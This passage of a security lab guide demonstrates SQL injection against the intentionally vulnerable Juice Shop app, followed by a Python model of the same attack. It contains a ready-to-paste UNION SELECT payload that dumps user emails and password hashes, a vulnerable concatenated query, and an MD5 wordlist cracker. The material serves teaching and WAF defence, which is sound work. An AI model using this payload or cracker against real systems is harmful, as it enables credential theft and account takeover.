4.3. The Juiceshop Application

We will start by establishing an RDP session to the Ubuntu 18.04 Client.

  • Start an RDP session to the Ubuntu 18.04 Client (Components > Ubuntu18.04 Client > ACCESS > XRDP)

    UDF Ubuntu Client RDP
  • When prompted, save the RDP file to your local machine and then open it to connect.

  • At the Ubuntu Login prompt, click on the OK button to continue.

    UDF Ubuntu XRDP

    Tip

    If the RDP session times out, refer to the User Credentials for the student user password.

  • Open the Firefox browser

  • Click on the Juiceshop bookmark on the browser bar

    ../../_images/juiceshop-bookmark.png
  • Accept the security risk by clicking Advanced and then Accept the Risk and Continue. The warning appears because the BIG-IP in this lab presents a self-signed certificate.

    ../../_images/certificate-risk.png

Here is the vulnerable Juiceshop application. Next, we will try a simple SQL injection attack that will illustrate why WAF protection is necessary.

../../_images/juiceshop-rdp.png
  • In the location bar, replace everything after the host name with the following path (the query string is already URL-encoded, so paste it exactly as shown):

    /rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--

  • The browser's location bar should look like this:

    https://10.1.20.200/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--

Decoded, the search term is qwert')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', '9' FROM Users--. The ')) closes the quoted search term and the application's own parentheses, the UNION SELECT appends one row per user (padded to nine columns so it matches the Products table), and the trailing -- comments out the rest of the original query. The application therefore returns the contents of the Users table, including each user's hashed password, in place of product search results. YIKES!

../../_images/juiceshop-sql.png

Warning

An attacker could easily grab the hashed passwords and run them through one of the free password hash crackers widely available on the internet. Hashes are not decrypted but guessed: Juice Shop stores unsalted MD5 hashes, so any user with a common password is recovered almost instantly. We will take steps to protect this insecure application using SSL Orchestrator and WAFaaS.
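The following script is an added example, not part of the lab or of Juice Shop's own code. It decodes the q= parameter from the lab URL above, runs it against an in-memory SQLite model of the product search (the query shape is modelled on Juice Shop's search endpoint, with a nine-column Products table and an unsalted-MD5 Users table; all rows, e-mail addresses, passwords and the wordlist are constructed here), shows the Users rows coming back through the UNION, cracks the returned hashes with a small wordlist as the Warning describes, and then runs the same payload through a parameterized version of the query, where it matches nothing.

```python
"""Worked model of the Juice Shop product-search injection (constructed data)."""
import hashlib
import sqlite3
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# The exact URL the lab pastes into the location bar.
LAB_URL = (
    "https://10.1.20.200/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT"
    "%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C"
    "%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--"
)

# Constructed wordlist standing in for the "free password hash cracker".
WORDLIST = ["123456", "password1", "letmein", "s3cretjuice"]


def decode_payload(url: str) -> str:
    """Return the percent-decoded value of the q= parameter."""
    return parse_qs(urlparse(url).query)["q"][0]


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the Juice Shop database (constructed rows).

    Products has nine columns, which is why the payload pads its UNION
    SELECT to nine values; Users stores unsalted MD5 password hashes.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Products (
            id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL,
            deluxePrice REAL, image TEXT, createdAt TEXT, updatedAt TEXT,
            deletedAt TEXT);
        CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        INSERT INTO Products VALUES
            (1, 'Apple Juice', 'Fresh pressed', 1.99, 0.99, 'apple.jpg', '', '', NULL),
            (2, 'Lemon Juice', 'Sour and cold', 2.99, 1.99, 'lemon.jpg', '', '', NULL);
        """
    )
    # Constructed users; the hashes are computed, not copied from Juice Shop.
    for uid, email, pw in [(1, "alice@example.com", "s3cretjuice"),
                           (2, "bob@example.com", "password1")]:
        conn.execute("INSERT INTO Users VALUES (?, ?, ?)",
                     (uid, email, hashlib.md5(pw.encode()).hexdigest()))
    return conn


def vulnerable_search(conn: sqlite3.Connection, criteria: str) -> List[Tuple]:
    """Search modelled on the Juice Shop query shape: the term is concatenated
    straight into SQL, so quotes and parentheses in it rewrite the statement
    and the trailing '--' comments out everything that follows."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE '%" + criteria + "%' "
           "OR description LIKE '%" + criteria + "%') AND deletedAt IS NULL) "
           "ORDER BY name")
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, criteria: str) -> List[Tuple]:
    """Same query with bound parameters: the term can only ever be data."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    like = "%" + criteria + "%"
    return conn.execute(sql, (like, like)).fetchall()


def crack_md5(digest: str, wordlist: List[str]) -> Optional[str]:
    """Recover a password from an unsalted MD5 by hashing each candidate."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def dump_and_crack(conn: sqlite3.Connection, url: str,
                   wordlist: List[str]) -> List[Tuple[str, Optional[str]]]:
    """Run the lab URL against the vulnerable search and crack what comes back.

    In the UNION rows the columns line up with Products, so column 1 holds the
    email and column 2 the password hash (the '4'..'9' literals are padding)."""
    rows = vulnerable_search(conn, decode_payload(url))
    return sorted((row[1], crack_md5(row[2], wordlist)) for row in rows)


if __name__ == "__main__":
    db = build_db()
    print("decoded q:", decode_payload(LAB_URL))
    for email, password in dump_and_crack(db, LAB_URL, WORDLIST):
        print(email, "->", password)
    print("parameterized query returns:", safe_search(db, decode_payload(LAB_URL)))
```

The parameterized variant is the application-side fix; the WAF configured in the following sections is the compensating control for applications you cannot change, and the decoded payload printed above is the kind of signature (quote, UNION SELECT, comment sequence) that a WAF's SQL injection signatures key on.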